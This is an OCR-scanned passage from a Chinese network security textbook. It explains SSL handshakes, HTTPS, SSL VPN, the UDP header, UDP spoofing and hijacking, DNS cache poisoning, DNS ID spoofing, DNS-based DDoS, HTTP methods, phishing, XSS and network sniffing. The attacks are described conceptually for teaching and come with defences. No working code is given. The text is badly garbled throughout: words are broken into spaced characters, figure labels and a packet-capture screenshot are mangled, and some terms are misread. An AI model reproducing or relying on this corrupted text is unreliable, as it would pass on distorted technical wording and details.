息 的 Hash 值 ,并 与 Finished 消息 的 解密 结果 相 比 较 , 如 果 二 者 相同 且 MAC 值 验 证 成 功 ， 
则 证 明 密 钥 和 加 密 套件 协商 成 功 。 

同样 地 ,SSL 服务 器 发 送 Change Cipher Spec 消息 ,通知 SSL 客户 端 后 续 报 文 将 采用 
协商 好 的 密 钥 和 加 密 套 件 进行 加 密 和 MAC 计算 。 

SSL 服务 器 计算 已 交互 的 握手 消息 的 Hash 值 ,利用 协商 好 的 密 钥 和 加 密 套 件 处 理 
Hash 值 (计算 并 添加 MAC 值 、. 加 密 等 ) ,并 通过 Finished 消息 发 送 给 SSL 客户 端 。SSL 客 
户 端 利 用 同样 的 方法 计算 已 交互 的 握手 消息 的 Hash 值 , 并 与 Finished 消息 的 解密 结果 相 
比较 ,如 果 二 者 相同 且 MAC 值 验 证 成 功 , 则 证 明 密 钥 和 加 密 套件 协商 成 功 。 

SSL 客户 端 接收 到 SSL 服务 器 发 送 的 Finished 消息 后 ,如 果 解 密 成 功 , 则 可 以 判断 
SSL 服务 器 是 数字 证 书 的 拥有 者 , 即 SSL 服务 器 身份 验证 成 功 ,因为 只 有 拥有 私 钥 的 SSL 
服务 器 才能 从 Client Key Exchange 消息 中 解密 得 到 前 主 密 钥 ,从 而 间接 实现 了 SSL 客户 
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端 对 SSL 服务 器 的 身份 验证 。 

(2) 验证 服务 器 和 客户 端的 SSL 握手 过 程 。SSL 客户 端的 身份 验证 是 可 选 的 ,由 SSL 
服务 器 决定 是 否 验证 SSL 客户 端的 身份 。 如 图 2-30 所 示 ,如果 SSL 服务 器 验证 SSL 客户 
端 身 份 , 则 SSL 服务 器 和 SSL 客户 端 除了 交互 “只 验证 服务 器 的 SSL 握手 过 程 ” 中 的 消息 
协商 密 钥 和 加 密 套件 外 ,还 需要 进行 以 下 操作 。 

(D SSL 服务 器 发 送 Certificate Request 消息 ,请 求 SSL 客户 端 将 其 证 书 发 送 给 SSL JR 
务 器 。 

@ SSL 客户 端 通过 Certificate 消息 将 携带 自己 公 钥 的 证 书 发 送 给 SSL 服务 器 。SSL 
服务 器 验证 该 证 书 的 合法 性 。 

© SSL 客户 端 计算 已 交互 的 握手 消息 、 主 密 钥 的 Hash 值 ,利用 自己 的 私 钥 对 其 进行 
加 密 , 并 通过 Certificate Verify 消息 发 送 给 SSL 服务 器 。 

@ SSL 服务 器 计算 已 交互 的 握手 消息 、 主 密 钥 的 Hash 值 ,利用 SSL 客户 端 证 书 中 的 
公 钥 解密 Certificate Verify 消息 ,并 将 解密 结果 与 计算 出 的 Hash 值 相 比较 。 如 果 二 者 相 
同 , 则 SSL 客户 端 身份 验证 成 功 。 

SSL 客 户 端 SSL 服 务 器 端 


(1) Client Hello 





(2) Server Hello 





(3) Certificate 





(4) Certificate Request 





(5) Server Hello Done 
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2-30 ”验证 服务 器 和 客户 端的 SSL 握手 过 程 


(3) 恢复 原 有 会 话 的 SSL 握手 过 程 。 在 协商 会 话 参数 .建立 会 话 的 过 程 中 ,需要 使 用 公 
钥 密 钥 算法 来 加 密 密 钥 、 验 证 通信 对 端的 身份 ,其 计算 量 较 大 ,占用 了 大 量 的 系统 资源 。 为 
了 简化 SSL 握手 过 程 ,SSL 允许 重用 已 经 协商 过 的 会 话 , 具 体 过 程 如 图 2-31 所 示 。 

(D SSL 客户 端 发 送 Client Hello 消息 ,消息 中 的 会 话 ID 设置 为 计划 重用 的 会 话 的 ID。 

© SSL 服务 器 如 果 人 允许 重用 该 会 话 , 则 通过 在 Server Hello 消息 中 设置 相同 的 会 话 ID 
来 应 答 。 这 样 ,SSL 客户 端 和 SSL 服务 器 就 可 以 利用 原 有 会 话 的 密 钥 和 加 密 套件 ,不 必 重 
新 协商 。 

@ SSL 客户 端 发 送 Change Cipher Spec 消息 ,通知 SSL 服务 器 后 续 报 文 将 采用 原 有 会 
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话 的 密 钥 和 加 密 套 件 进行 加 密 和 MAC 计算 。 

@ SSL 客户 端 计算 已 交互 的 握手 消息 的 Hash 值 , 利 用 原 有 会 话 的 密 钥 和 加 密 套件 处 
Jil Hash 值 ,并 通过 Finished 消息 发 送 给 SSL 服务 器 ,以 便 SSL 服务 器 判断 密 钥 和 加 密 套 
件 是 否 正确 。 

同样 地 ,SSL 服务 器 发 送 Change Cipher Spec 消息 ,通知 SSL 客户 端 后 续 报 文 将 采用 
原 有 会 话 的 密 钥 和 加 密 套件 进行 加 密 和 MAC 计算 。 

SSL 服务 器 计算 已 交互 的 握手 消息 的 Hash 值 ,利用 原 有 会 话 的 密 钥 和 加 密 套件 处 理 
Hash 值 ,并 通过 Finished 消息 发 送 给 SSL 客户 端 ,以 便 SSL 客户 端 判断 密 钥 和 加 密 套 件 
是 否 正确 。 

4) 典型 应 用 

HTTPS 是 基于 SSL 安全 连接 的 HTTP 协议 。HTTPS 通过 SSL 提供 的 数据 加 密 、 身 
份 验证 和 消息 完整 性 验证 等 安全 机 制 ,为 Web 访问 提供 了 安全 性 保证 , 它 广泛 应 用 于 网 上 
银行 .电子 商务 等 领域 。 图 2-32 所 示 为 HTTPS 在 网 上 银行 中 的 应 用 。 某 银行 为 了 方便 客 
P ,提供 了 网 上 银行 业务 ,客户 可 以 通过 访问 银行 的 Web 服务 器 进行 账户 查询 ,转账 等 。 通 
过 在 客户 和 银行 的 Web 服务 器 之 间 建 立 SSL 连接 ,可 以 保证 客户 的 信息 不 被 非法 窃取 。 
SSL 客 户 端 SSL 服 务 器 端 银行 客户 A 


J (1) Client Hello ' 
r 
' 
' 
e 
1 
1 
1 
1 
1 
í 
' 
' 
me 
' 
' 
me 
1 











(2) Server Hello 





T 


某 银行 的 Web 服 务 器 


(3) Change Cipher Spec 









(4) Finished 





(5) Change Cipher Spec 





(6) Finished 





银行 客户 B 
图 2-31 恢复 原 有 会 话 的 SSL 握手 过 程 图 2-32 HTTPS 在 网 上 银行 中 的 应 用 


SSL VPN(Virtual Private Network ,虚拟 专用 网 ) 是 以 SSL 为 基础 的 VPN 技术 ,利用 
SSL 提供 的 安全 机 制 , 为 用 户 远程 访问 公司 内 部 网 络 提供 了 安全 保证 。 如 图 2-33 所 示 ， 
SSL VPN 通过 在 远程 接 和 人 用户, 和 SSL VPN 网 关 之 间 建立 SSL 安全 连接 ,允许 用 户 通过 
各 种 Web 浏览 器 ,以 各 种 网 络 接 入 方式 ,在 任何 地 方 远程 访问 企业 网 络 资源 ,并 能 够 保证 企 
业 网 络 的 安全 ,保护 企业 内 部 信息 不 被 窃取 。 


2.4.2 UDP 协议 的 安全 威胁 与 安全 机 制 


1. UDP 协议 

UDP 是 无 连接 的 ,不 可 靠 的 传输 层 协议 ,适合 于 一 次 传输 少量 数据 的 网 络 应 用 ,如 
DNS.SNMP 等 ; UDP 传输 的 可 靠 性 由 应 用 层 负 责 。 它 主要 用 于 不 要 求 分 组 顺序 到 达 的 传 
输 中 ,分 组 传输 顺序 的 检查 与 排序 由 应 用 层 完 成 ,提供 面向 事务 的 简单 但 不 可 靠 信息 传送 服 
务 。UDP 协议 的 主要 作用 是 将 网 络 数据 流 封装 为 二 进 制 的 数据 报 格式 后 发 送 到 IP 层 ; 作 
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合作 伙伴 企业 内 部 网 络 


2-33 SSL VPN 的 典型 组 网 环境 


为 应 用 层 的 下 层 协议 ,UDP 协议 负责 对 接收 到 的 数据 报 进行 解析 后 发 送 给 应 用 程序 。UDP 
协议 头 部 格式 如 图 2-34 和 图 2-35 所 示 。 





源 端口 (16 位 ) 目的 端口 (16 位 ) 
消息 长 度 (16 位 ) 校 验 和 (16 位 》 
数据 























-34 UDP 协议 头 部 格式 





Fil Edit Yie Ge Captus Analyze Statistics Telephony Tools Internals Help 
Kwara BALZA Aere T| iaqaamaummxiÓ 


Filter: |M]Eepression.. hee AT 










































| Source. Protocol 
3 4.447237 TCR 54 4420 > http [FIN, ACK] Seq=1 Ack=1 WineG3825 Len=0 
4 4.447249 TcP 54 4420 > http [FIN, ACK] Seq=1 Ack=1 win=6362s Lene 











i Frame S: 62 bytes on wire (496 bits), 62 bytes captured (496 bits) 

& Ethernet II, Src: IntelCor 85:1f:b7 (00:13 1f:b7), Ost: IPv4mcast 22:17:ea (01:00:5e:22:17:ea) 

Gi Internet Protocol, Sre: 192.168.1.100 (192.168.1.100), Dst: 234.34.23.234 (234.34.23.234) | 

E User Datagram Protocol, Sre Port: 4466 (4466), DSt Port: 33674 (33674) | 

Source port: 4466 (4466) | 
[ 





Destination port: 33674 (33674) 
Length: 28 
Ei Checksum: 0x75af [validation disabled] 
[Good Checksum: False] 
[Bad checksum: False] * 
oo00 01 00 Se 22 17 ea 00 13 20 85 1f b7 08 CO 45 00 
oo10 00 30 2c 30 00 O0 01 11 c9 74 CO a8 O1 64 ea 22 


0020 17 ea 11 72 83 8a 00 1c 75 af 10 00 00 00 2c 31 
0030 bé 91 ac 4f 76 12 34 13 16 fb 19 sb b7 32 














[D File: "C: Wocuments and SettingsAdmin- | Packets: 309 Displayed. 308 Marked. O Load time. 0:00.3T5 


图 2-35 UDP 协议 头 部 格式 界面 
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UDP 报 文 没有 可 靠 性 保证 、 顺 序 保证 和 流量 控制 字段 等 , 正 是 因为 UDP 协议 控制 选项 
较 少 ,在 数据 传输 过 程 中 延迟 小 .数据 传输 效率 高 。 

(1) 源 端口 和 目的 端口 , 均 为 16 位 ,用 来 标识 源 端 和 目的 端的 应 用 进程 。 

(2) 消息 长 度 ,16 位 ,用 来 标识 UDP 长 度 和 UDP 数据 的 总 长 度 字 节 。 

(3) 校 验 和 ,16 位 ,用 来 对 UDP AX, UDP 数据 和 一 个 12B 的 UDP 伪 头 部 进行 校 验 。 
UDP 伪 头 部 格式 如 图 2-36 所 示 。 其 算法 与 IP 协议 的 校 验 和 算法 相同 。 校 验 和 字段 是 可 
选项 ,当选 择 不 填写 时 ,该 字段 置 零 ; 如 果 选 择 填写 且 计 算 结 果 为 0, 则 必须 全 部 填 1。 在 接 
收 端 , 如 果 UDP 计算 的 结果 与 发 送 端 不 同 ,接收 端 会 判定 该 包 有 错误 ,并 直接 丢掉 此 封包 ， 
不 会 回 送 任何 信息 。 





源 IP 地 址 
目的 IP 地 址 
0 协议 UDP 长 度 














图 2-36 UDP 伪 头 部 格式 


UDP 是 一 个 无 连接 的 协议 ,利用 UDP 传输 数据 之 前 ,在 源 端 和 目的 端 不 需要 建立 连 
接 ; UDP 是 一 个 不 可 靠 的 协议 ,在 从 发 送 端 和 接收 端的 数据 传递 过 程 中 出 现 数据 报 丢失 的 
情况 ,协议 本 身 不 能 作出 任何 检测 或 提示 ; UDP 是 一 个 不 保 序 的 协议 ,不 能 确保 数据 的 发 
送 和 接收 顺序 , 当 发 送 了 多 个 数据 报时 ,可 能 先 发 送 的 数据 报 比 后 发 送 的 迟到 。 

2. UDP 面临 的 威胁 

(D UDP 假冒 (UDP Spoof) 攻 击 本 质 上 是 IP 假冒 攻击 , 即 攻击 者 可 以 构造 UDP 包 ,其 
源 地 址 为 某 个 节点 的 IP 地址 ,通过 这 种 方式 向 服务 器 发 起 请 求 , 从 而 触发 服务 器 的 某 些 操 
作 。 如 果 攻 击 者 能 够 窃听 UDP 应 答 包 , 则 攻击 者 能 够 从 这 样 的 攻击 行为 中 获得 所 需 的 信 
息 , 如 图 2-37 所 示 。 


@ UDP 应 答 
qd kk m | 
O UDP 请 求 源 地 址 


| 
192.168.1.101 ! 192.168.1.101 
可 信 客 户 端 ' 
i 

| 








192.168.1.103 192.168.1.104 
服务 器 


图 2-37 UDP 假冒 攻击 


(2) UDP 劫持 (UDP Hijack) 攻 击 本 质 上 也 是 UDP 假冒 攻击 ,如 图 2-38 所 示 , 可 信和 客 
户 端 发 起 UDP 请 求 后 ,攻击 者 假冒 服务 器 发 出 UDP 应 答 ,这 种 应 答 有 可 能 造成 错误 的 结 
果 。 虽 然 服务 器 的 应 答 也 可 能 到 达 客 户 端 ,但 是 如 果 客 户 端的 操作 已 经 触发 , 则 可 能 会 造成 
损失 。 
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(D UDP 请 求 
£ cem T TM | 
KE - 
(D 填充 UDP 


192.168.1.101 应 答 源 地 址 
可 信 客 户 端 。 192.168.1.104 





192.168.1.103 192.168.1.104 
服务 器 


图 2-38 UDP 支持 攻击 


防范 针对 UDP 的 攻击 是 比较 简单 的 , 即 避免 采用 基于 TP 地 址 的 信任 机 制 ,如 在 基于 
UDP 的 应 用 层 协议 中 加 入 认证 机 制 等 。 


T" 





2.5 应 用 层面 临 的 安全 威胁 


基于 TCP、UDP 提供 的 服务 ,可 以 构建 各 种 应 用 层 协议 ,如 超 文本 传输 协议 (HTTP)、 
文件 传输 协议 (FTP) ,域名 解析 协议 (DNS) 等 。 


2.5.1 DNS 协议 面临 的 安全 威胁 


1. DNS 协议 

域名 (Domain Name) 是 一 个 用 点 分 隔 的 字符 串 , 用 于 表示 Internet. 上 某 一 台 计 算 机 或 
计算 机 组 的 名 称 。Internet 上 用 于 定位 主机 的 方式 是 IP 地 址 ,因此 必须 有 一 种 机 制 把 域名 
转换 为 IP 地 址 。 域 名 服务 (Domain Name Service,DNS) 是 将 域名 和 IP 地 址 互相 映射 的 一 
个 分 布 式 数据 库 ,是 Internet 上 的 一 项 核心 服务 。 例 如 ,www. example. org 是 一 个 域名 ,其 
对 应 的 IP 地 址 为 192. 0. 32. 10。 基 于 DNS, 用 户 不 须要 记 住 一 长 串 无 意义 的 数字 ,只 需 记 
住 有 意义 的 字符 串 www. example. org 即 可 。 

DNS 的 命名 空间 是 一 个 分 层 树 状 结构 ,如 图 2-39 所 示 。 根 节点 是 顶级 域名 (Top Level 
Domain, TLD) ,如 com.org.net 和 cn 等 。 顶 级 域名 分 为 通用 顶级 域名 (General Top-Level 
Domain,GTLD) 和 国家 地 区 顶级 域名 (Country Code Top-Level Domain,CCTLD)。GTLD 
包括 com、org 和 net 等 ,CCTLD 一 般 是 两 字母 缩写 ,如 uk( 英 国 )、us( 美 国 ) 和 cn( 中 国 )。 

DNS 的 查询 方式 分 为 两 类 , 即 递 归 查 询 和 和 迭代 查询 。 在 网 络 边界 上 ,客户 端 和 本 地 
DNS 服务 器 之 间 一 般 采 用 递归 查询 方式 , 它 负责 处 理 客 户 端的 DNS 查询 请 求 ,返回 给 客户 
端 所 请 求 的 域名 和 IP 地址 的 映射 关系 。DNS 服务 器 之 间 一 般 采 用 和 迭代 查询 方式 ,DNS 服 
务 器 应 答 给 客户 端的 不 一 定 是 域名 和 IP 地 址 的 映射 关系 ,也 可 以 是 另 一 台 DNS 服务 器 A 
户 端 再 将 请 求 发 送 到 另 一 台 DNS 服务 器 。 

下 面 以 查询 www. example. org 为 例 进行 说 明 , 步 又 如 下 。 

COD 客户 端 发 起 访问 请 求 www. example. org ,查找 本 地 hosts 文件 ,发 现 没 有 www. 
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2-39 DNS 服务 器 的 分 层 结构 


example. org 和 IP 地 址 映射 关系 ; 发 送 查询 报 文 “query www. example. org "至 本 地 DNS 
服务 器 ,DNS 服务 器 首先 查找 本 地 DNS 缓存 ,如 果 存 在 则 www. example. org 和 IP 地 址 的 
映射 关系 直接 返回 结果 。 如 果 记 录 过 期 或 不 存在 , 则 进入 步骤 (2) 。 

(2) 本 地 DNS 服务 器 向 根 域名 服务 器 发 送 查 询 报 文 “query www. example. org”, 根 域 
名 服务 器 返回 . org 域 的 授权 域名 服务 器 地 址 。 

G) 本 地 DNS 服务 器 向 . org 域 的 授权 域名 服务 器 发 送 查 询 报 文 “query www. 
example. org”, 得 到 . example. org 域 的 授权 域名 服务 器 地 址 。 

(4) 本 地 DNS 服务 器 向 . example. org 域 的 授权 域名 服务 器 发 送 查 询 报 文 “query 
www. example. org”, 得 到 主机 www. example. org 的 A 记录 , 存 人 自身 缓存 并 返回 客户 端 。 

步骤 (1) 为 递归 查询 ,步骤 (2) 到 步骤 (4) 为 迭代 查询 。 在 互联 网 上 ,传统 的 HTTP 信息 
获取 过 程 如 图 2-40 所 示 。 











© HTTP 应 答 








www.example.org 
© HTTP 请 求 





























192.0.32.10 
© DNS 应 答 
@ DNS 应 答 -| 192.0.32.10 
ar 2 e 
客户 端 192.0.32.10 P ,其 他 DNS 
z 
GO DNSKRHJ @ DNS 查询 
www.example.org? —— -区 -| WW ample org? 




















本 地 DNS 服 务 器 
2-40 ”传统 的 网 络 信 息 获 取 过 程 


2. DNS 协议 面临 的 安全 威胁 
DNS 劫持 攻击 包括 DNS 缓存 毒化 (DNS cache Poisioning)、DNS ID 欺骗 (DNS ID 
Spoofing) 以 及 基于 DNS 的 DDoS 攻击 。 
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Q) DNS 缓存 毒化 。 攻 击 者 掌控 有 一 个 自己 的 域 (attacker. net) 和 一 个 已 被 攻陷 的 
DNS 服务 器 (ns. attacker. net) 。 攻 击 者 通过 查询 www. attacker. net, 迫使 本 地 域名 服务 器 
A 5j ns. attacker. net 通信 ,并 使 ns. attacker. net 回复 针对 www. attacker. net 的 查询 ,同时 
通过 区 域 传 送 (Zone Transfer) 的 方式 将 错误 的 或 被 和 贷 改 过 的 DNS 信息 (如 www. google. 
com 一 81.81.81.81) 返 回 给 本 地 域名 服务 器 A。 当 其 他 用 户 向 域名 服务 器 A 查询 www. 
google. com 时 ,服务 器 会 返回 给 81. 81. 81. 81。 具 体 流程 如 图 2-41 所 示 。 


CD www.example.org? 
ID=111 
m~o TH 




















www.example.org=1.1.1.1 
受害 客户 端 Dim oA 


LM fon RIA 
(8) www.example.org=1.1.1.1 


PEt Ur W ukhu iu k, ID=36 


























(2) www“example.org? 
ID=36 











ns.attacker.net 


2-41 DNS 毒化 缓存 示意 图 


(2) DNS ID 欺骗 。 客 户 端 向 DNS 服务 器 查询 时 ,数据 包 中 包含 一 个 16 位 的 伪 随 机 数 
作为 识别 码 (ID), 这 个 伪 随 机 数 也 将 会 出 现在 从 DNS 服务 器 返回 的 响应 信息 包 里 。 客 户 
端 收 到 回复 后 ,会 对 比 这 两 个 数字 ,如 果 一 致 , 则 认为 收 到 的 信息 有 效 ; 否则 忽略 该 响应 包 。 
但 是 ,这 种 设计 并 不 安全 。 首 先 ,DNS 协议 是 基于 无 状态 的 UDP 协议 ,因此 任何 攻击 者 都 
可 以 发 送 伪 造 的 响应 包 给 请 求 者 ,而 请 求 者 无 法 判断 该 包 是 否 合法 ; 其 次 ,如 果 攻 击 者 能 
够 窃取 到 该 DNS 请 求 , 如 攻击 者 和 被 攻击 者 在 同一 局 域 网 , 则 攻击 者 能 够 获得 DNS 查询 
的 ID 号 ,从 而 可 以 构造 合法 的 响应 包 ,而 其 中 的 域名 解析 协议 内 容 可 以 由 攻击 者 来 任意 
确定 。 

上 述 攻 击 方 式 要 求 攻击 者 能 够 窃听 受害 者 的 DNS 查询 请 求 , 从 而 获得 其 查询 请 求 包 的 
ID。 如 果 攻 击 者 不 能 够 窃听 受害 者 的 DNS 查询 请 求 包 ,DNS ID 欺骗 攻击 同样 也 是 可 以 实 
施 的 。 攻 击 者 向 受害 者 的 DNS 服务 器 发 送 查 询 请 求 给 ns. google. com, 攻 击 者 紧 接 着 发 送 
多 份 伪 造 的 应 答 包 。 根 据 生 日 悖 论 的 原理 ,伪造 应 答 包 的 ID 与 受害 者 DNS 服务 器 所 发 出 
的 查询 请 求 包 的 ID 相 匹 配 的 概率 是 较 高 的 ,因此 攻击 者 很 容易 得 手 。DNS ID 欺骗 的 流程 
示意 图 如 图 2-42 所 示 。 

(3) 基于 DNS 的 DDoS 攻击 。 攻 击 者 利用 僵尸 网 络 发 送 大 量 伪造 的 查询 请 求 至 DNS 
服务 器 。 这 些 查询 请 求 包 的 源 IP 地 址 被 设置 为 受害 者 的 IP 地 址 ,因此 DNS 服务 器 会 把 响 
应 信息 发 送 给 受害 者 。 大 量 响应 信息 会 导致 被 攻击 者 处 理 能 力 被 占用 ,从 而 形成 拒绝 服务 
攻击 。 基 于 DNS 的 DDoS 攻击 示意 如 图 2-43 所 示 。 
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攻击 者 
(D www.example.org? 


ID=111 >< 


受害 Te www.example.org-1.1.1.1 
受害 w- [^ ID=111 




















DNS 服务 器 





(D www.example.org? ID=xxxx 


——L  HA8 i 


à : — 
= www.example.org=1.1.1.1 ID=xxxx 


大 量 猜 测 ID 的 伪造 应 答 数据 包 一 
攻击 者 MT DONS 服务 器 




















(8) www.example.org? 














@ www.example.org=1.1.1.1 











受害 客户 端 


图 2-42 DNS ID 欺骗 示意 图 










(D www.example.org?ID=xxxx 
— | 发 出 大 量 查询 ，From IP=1.1.1.1 























DNS 服 务 器 组 
(2) www.example.org=1.2.3.4 
攻击 者 大 量 应 答 
被 攻击 者 


1.1.1.1 
图 2-43 基于 DNS 的 DDoS 攻击 示意 图 


2.5.2 HTTP 协议 面临 的 安全 威胁 


1. HTTP 协议 

HTTP 协议 是 一 个 应 用 层 协议 ,设计 用 于 分 布 式 的 (Distributed) Hy JE] hY (Collaborative) 和 
超 媒体 的 (Hypermedia) 信 息 系统 ,是 一 个 通用 的 无 状态 协议 , 它 将 所 有 的 数据 都 视 为 二 
制 数据 流 。 
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在 HTTP/1. 1 协议 中 共 定 义 了 8 种 请 求 方式 ,说 明 如 下 。 

(D GET。 向 特定 的 资源 发 出 请 求 。 注 意 ; GET 方法 不 应 当 被 用 于 产生 * 副 作用 ?的 
操作 中 ,如 在 Web 应 用 程序 中 ,其 中 一 个 原因 是 GET 可 能 会 被 网 络 蜘蛛 等 随意 访问 。 

(2) HEAD。 向 服务 器 索要 与 GET 请 求 相 一 致 的 响应 ,只 不 过 响应 体 将 不 会 被 返回 。 
这 一 方法 可 以 在 不 必 传输 整个 响应 内 容 的 情况 下 ,就 可 以 获取 包含 在 响应 消息 头 中 的 元 信 
息 。 该 方法 常用 于 测试 超 链接 的 有 效 性 .是否 可 以 访问 以 及 最 近 是 否 更 新 。 

(3) OPTIONS。 返 回 服务 器 针对 特定 资源 所 支持 的 HTTP 请 求 方法 。 也 可 以 利用 向 
Web 服务 器 发 送 " * ”的 请 求 来 测试 服务 器 的 功能 性 。 

(D POST。 向 指定 资源 提交 数据 进行 处 理 请 求 ( 如 提交 表单 或 者 上 传 文件 )。 数 据 被 
包含 在 请 求 体 中 。POST 请 求 可 能 会 导致 新 的 资源 的 建立 和 /或 已 有 资源 的 修改 。 

(5) PUT。 向 指定 资源 位 置 上 传送 其 最 新 内 容 。 

(6) DELETE。 请求 服务 器 删除 Request-URI 所 标识 的 资源 。 

(7) TRACE。 回 显 服务 器 收 到 的 请 求 , 主 要 用 于 测试 或 诊断 。 

(8) CONNECT, HTTP/1. 1 协议 中 预 留 给 能 够 将 连接 改 为 管道 方式 的 代理 服务 器 。 

一 个 最 简单 的 访问 Google 的 HTTP 请 求 如 图 2-44 所 示 。 








本 地 DNS 服 务 器 







www.google.com? 


www.google.com=203.208.39.22 


GET/HTTP/1. In 
a» Host: 203.208.39.22 nin 
www.google.com 


客户 端 203.208.39.22 
2-44 访问 Google 的 HTTP 请 求 示意 图 









2. HTTP 协议 面临 的 安全 威胁 

CD 钓鱼 攻击 。HTTP 协议 没有 考虑 用 户 认证 ,因此 用 户 不 能 确定 远 端 服 务 器 的 真实 
身份 。 例 如 , 某 公 司 推出 的 Web XX 2.0, 具 有 Gmail 应 用 程序 入 口 ,如 图 2-45 所 示 。 用 户 
可 以 通过 该 页 面 直接 输入 Gmail 的 用 户 名 和 登录 邮箱 口令 。 但 是 ,该 页 面 没有 直接 将 数据 
发 送 给 Google , 而 是 先 将 数据 发 送 给 公司 的 服务 器 ,再 由 公司 的 服务 器 返回 邮箱 内 容 , 这 个 
过 程 对 用 户 是 透明 的 。 

这 种 方式 的 钓鱼 攻击 相对 容易 被 发 现 ,因为 通过 观察 网 页 的 URL, 用 户 或 客户 端 可 以 
发 现 异常 。 但 是 ,如 果 攻 击 者 掌控 或 者 入 侵 了 DNS 服务 器 , 则 情况 会 更 加 糟糕 。 例 如 ,在 
DNS 记录 中 ,网 址 mail. google. com 被 指向 了 钓鱼 网 站 的 IP 地 址 ,那么 当 访 问 mail. 
google. com 时 ,用 户 会 不 知 不 觉 转 向 钓鱼 网 站 ,而且 通常 的 基于 网 址 的 钓鱼 网 站 识别 系统 
(Chrome 或 Firefox) 都 会 失效 。 

在 通常 情况 下 ,用 户 可 以 使 用 HTTPS 而 不 是 HTTP, 从 而 避 开 一 般 的 中 间 人 攻击 , 因 
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GET/HTTP/1.1\r\n 7 

2-777 Host: 21.120.12.12£ min] ^ = > 

her pa 

s ne Tem web2.qq.com 
客户 端 21.120.12.12 





; M 
ma [—— mail.google.com, 
m 


74.125.71.83 、\ 
€^ ` 


ER i 


2-45 X48] Gmail 登录 页 面 


为 HTTPS 会 对 服务 器 的 身份 进行 验证 ,但 是 这 并 不 是 绝对 的 。 如 果 攻 击 者 能 够 同时 入侵 并 操 
作 根 证 书 (Root Certification) 发 布 者 (如 CNNIC) 和 域名 服务 器 ,那么 中 间 人 攻击 也 不 可 避免 。 

(2) 跨 站 脚本 攻击 。 跨 站 脚本 攻击 (Cross Site Scripting,XSS) 是 指 攻击 者 将 恶意 的 客 
户 端 脚 本 (Client-side Script) 注 入 正常 的 网 页 中 。 跨 站 脚本 攻击 不 是 针对 HTTP 协议 ,而 
是 针对 HTTP 上 的 应 用 。 

跨 站 脚本 攻击 分 为 3 类 , 即 持久 型 跨 站 (Persistent XSS) 、 非 持久 型 跨 站 (Non-persistent 
XSS) fll DOM 跨 站 (DOM-based XSS), 

D 持久 型 跨 站 。 这 是 最 直接 的 危害 类 型 , 跨 站 数据 存储 在 服务 器 (数据 库 )。 当 用 户 访 
问 正常 网 页 时 ,服务 器 端 会 将 恶意 的 指令 夹杂 在 正常 网 页 中 传 回 给 用 户 。 

© 非 持久 型 跨 站 。 当 服务 器 端 未 能 正确 地 过 滤 客 户 端 发 出 的 数据 ,并 根据 客户 端 提交 
的 恶意 数据 生成 页 面 时 ,就 有 可 能 生成 非 持 久 型 跨 站 攻击 。 

G DOM 跨 站 。 这 类 存在 于 页 面 的 客户 端 脚 本 中 ,如 果 客 户 端 脚本 动态 生成 HTML 的 
时 候 没有 严格 检查 和 过 滤 参 数 . 则 会 导致 DOM 跨 站 攻击 o 

避免 KSS 主要 从 服务 器 端 和 客户 端 入手 。 在 客户 端 , 用 户 可 以 使 用 一 些 辅助 性 的 工 
具 , 如 Firefox 的 插件 NoScript 来 减 小 跨 站 脚本 攻击 的 危害 。 在 服务 器 端 ,程序 必须 将 使 用 
者 所 提供 的 内 容 进 行 过 滤 ,许多 语言 都 提供 对 HTML 进行 过 滤 的 功能 。 
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2.6 网 络 监听 


以 太 网 通信 是 广播 方式 ,在 同一 个 网 段 的 所 有 网 络 接口 都 可 以 访问 物理 媒体 上 传输 的 
数据 ,每 一 个 网 络 接口 都 有 一 个 唯一 的 MAC 地 址 ,长 度 为 48B。 一 般 来 说 ,每 一 块 网 卡 上 
的 MAC 地 址 都 是 不 同 的 。 在 MAC 地 址 和 IP 地 址 间 使 用 ARP 和 RARP 协议 进行 相互 
转换 。 

2.6.1 网 络 监 听 原 理 


通常 一 个 网 络 接 口 只 接收 两 种 数据 帧 , 即 与 自己 硬件 地 址 相 匹 配 的 数据 帧 、 发 向 所 有 机 
器 的 广播 数据 帧 。 

网 卡 负责 数据 的 收发 , 它 接收 传输 来 的 数据 帧 ,网 卡 的 单片机 程序 查看 数据 帧 的 
MAC 地 址 ,根据 网 卡 驱 动 程序 设置 的 接收 模式 判断 该 不 该 接收 。 如 果 接 收 , 则 接收 后 通知 
CPU; 否则 丢弃 该 数据 帧 ,所 以 被 丢弃 的 数据 帧 直接 被 网 卡 截断 ,计算 机 根本 不 知道 。CPU 
得 到 中 断 信 号 产生 中 断 , 操 作 系 统 根据 网 卡 驱动 程序 设置 的 网 卡 中 断 程序 地 址 调用 驱动 程 
序 接收 数据 ,驱动 程序 接收 数据 后 放 入 信号 堆栈 让 操作 系统 处 理 。 网 卡 有 4 种 接收 方式 : 
广播 方式 ,接收 网 络 中 的 广播 信息 ; 组 播 方式 ,接收 组 播 数据 ; 直接 方式 ,只 有 目的 网 卡 才 
能 接收 该 数据 ; 混杂 模式 ,接收 一 切 通过 它 的 数据 ,而 不 管 该 数据 是 否 是 传 给 它 的 。 

以 太 网 的 工作 机 制 是 把 要 发 送 的 数据 包 发 往 连接 在 同一 网 段 中 的 所 有 主机 ,在 包头 中 
包括 有 目标 主机 的 正确 地 址 ,只 有 与 数据 包 中 目标 地 址 相同 的 主机 才能 接收 到 信息 包 。 
图 2-46 是 一 个 简单 的 网 络 连接 ,机 器 A、B、C 与 集线器 Hub Ye Be. Hub 通过 路 由 器 访问 外 
部 网 络 。 











图 2-46 简单 的 网 络 连 接 


管理 员 在 机 器 A 上 使 用 FTP 命令 向 机 器 C 进行 远程 登录 ,在 这 个 网 络 里 数据 的 传输 
过 程 是 这 样 的 : 首先 机 器 A 上 的 管理 员 输 入 登录 机 器 C 的 FTP 口令 ,经 过 应 用 层 FTP 协 
议 、 传 输 层 TCP 协议 、 网 络 层 IP 协议 数据 链 路 层 上 的 以 太 网 驱动 程序 一 层 一 层 地 包 于 ,最 
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后 送 到 物理 层 。 接 下 来 数据 帧 传输 到 Hub 上 ,然后 由 Hub 向 每 一 个 节点 广播 此 数据 帧 ,机 
器 BB 接 收 到 由 Hub 广播 发 出 的 数据 帧 ,并 检查 数据 帧 中 的 地 址 是 否 和 自己 的 地 址 匹配 , 结 
果 不 匹 配 , 故 丢弃 此 数据 帧 。 而 机 器 C 也 收 到 了 数据 帧 ,并 先进 行 比较 ,发 现 与 自己 的 地 址 
匹配 ,于 是 接收 下 来 并 对 此 数据 帧 进行 分 析 处 理 。 

当主 机 工作 在 监听 模式 下 ,不 管 数据 包 中 的 目标 MAC 地 址 是 什么 ,主机 都 可 以 接收 
